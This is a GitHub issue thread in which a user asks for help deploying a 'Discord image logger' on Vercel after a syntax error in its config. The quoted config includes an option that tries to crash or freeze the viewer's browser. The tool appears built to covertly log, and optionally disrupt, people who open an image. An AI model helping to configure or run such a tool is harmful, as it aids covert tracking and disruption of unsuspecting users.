### ISSUE TITLE
Your code gives me a syntax error in the username field

### ISSUE THREAD

**Issue by voidsshadows** [dekrypted/discord-image-logger#31]
This causes vercel to not start my server

**Comment by dekrypted** [comment]
show me the username line and the exact error

**Comment by voidsshadows** [comment]
` # CUSTOMIZATION #
    "username": "logger", # Set this to the name you want the webhook to have
    "color": 0x00FFFF, # Hex Color you want for the embed (Example: Red is 0xFF0000)

    # OPTIONS #
    "crashBrowser": {
        "doCrashBrowser": False, # Tries to crash/freeze the user's browser, may not work. (I MADE THIS, SEE https://github.com/dekrypted/Chromebook-Crasher)
        "customMessage": "This browser has been pwned by DeKrypt's Image Logger. https://github.com/dekrypted/Discord-Image-Logger",
    },`
    
    
    
    
[GET] /api/main.py
04:12:22:47
[ERROR] Runtime.UserCodeSyntaxError: Syntax error in module 'vc__handler__python': invalid syntax (main.py, line 20)
Traceback (most recent call last):
  File "./api/main.py" Line 20
        "username": "logger"

**Comment by voidsshadows** [comment]
looks exactly the same as ur file with the name change

**Comment by voidsshadows** [comment]
Fixed the code but now the image dosent load in discord

**Comment by voidsshadows** [comment]
![image](https://user-images.githubusercontent.com/75304648/215685004-9475e420-1667-4eaa-a336-e5f6879eb402.png)

**Comment by dekrypted** [comment]
idk, but it's an exception in the username field, not my code later down, so you entered something weird. start from scratch.

**Comment by dekrypted** [comment]
Have you fixed this?

**Comment by dekrypted** [comment]
Closed - Inactivity
